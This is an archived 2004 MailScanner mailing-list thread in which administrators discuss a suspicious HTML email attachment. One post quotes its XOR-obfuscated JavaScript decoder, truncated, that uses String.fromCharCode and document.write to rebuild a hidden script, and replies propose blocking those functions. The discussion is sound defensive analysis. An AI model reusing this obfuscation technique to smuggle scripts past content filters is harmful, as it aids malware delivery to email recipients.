Possible virus in JavaScript attachment?
Rob Charles
rob at thehostmasters.com
Tue Mar 9 13:59:20 GMT 2004
I have seen at least 100 or so over the last couple weeks...
Thought it was just marketing crap , but now that you mentioned it... there
was some weird coding in it....
Rob Charles
TheHostMasters
Montreal, Canada
514-846-0006
Rob at TheHostMasters.com
http://www.TheHostMasters.com
----- Original Message -----
From: "Olivier Diserens" <olivier.diserens at FASTNET.CH>
To: <MAILSCANNER at JISCMAIL.AC.UK>
Sent: Monday, March 08, 2004 4:42 PM
Subject: Re: Possible virus in JavaScript attachment?
> Hi,
>
> I already saw this a couple of times.
> This is a way to inject some javascript code in a page without actually
> writting the script, but instead giving the ascii characters code..
> thus bypassing the dangerous contents check.
> The script will itself do the translation and get back the bad script.
>
> I was thinking of a check around the fromCharCode() function. Denying
> it will block this kind of stuff. I can't see another fromCharCode-like
> function that would be usefull to prevent, but I'm not a javascript
> expert.
>
> document.write may also be a little bit risky, no ?
>
> other ideas ?
>
> best regards
> Olivier Diserens
>
>
>
> Le 8 mars 04, à 22:30, Jim Holland a écrit :
>
> > I have come across a number of suspicious messages with subject line
> > "hi", body text "This message has an attach", and the attachment
> > "superscripted.html", which contains the following type of scripting:
> >
> > <script language="JavaScript">
> > difficulties = new Array(115,
> > 180,145,215,7,246,108,140,123,22,242,
> > . . .
> > 231,65,65,159,150,180,80,101,27,27,
> > 218);
> > bribed = new Array(79,
> > 220,229,186,107,200,97,134,71,116,157,
> > . . .
> > 80,73,78,111,124,5,90,139,104,129
> > );
> > Shelton = 1142;
> > rupee = 231;
> > var obelisk = "";
> > for(Winslow = 0; Winslow < Shelton; Winslow++)
> > obelisk = obelisk + String.fromCharCode(difficulties[Winslow] ^
> > bribed[Winslow % rupee]);
> > document.write(obelisk);
> > </script>
> >
> > These are not being blocked by MailScanner/ClamAV. I don't know any
> > JavaScript, but the above looks distinctly suspect. Does anyone know
> > what
> > it is all about/whether it is potentially harmful? Does this indicate
> > a
> > possible exploit that should be blocked?
> >
> > We automatically quarantine any html attachments that contain
> > scripting,
> > but this is just done by testing using a simple grep and has nothing
> > to do
> > with MailScanner. Are we just being paranoid? I would prefer to have
> > this done by MailScanner for consistency.
> >
> > Regards
> >
> > Jim Holland
> > System Administrator
> > MANGO - Zimbabwe's non-profit e-mail service
>
More information about the MailScanner
mailing list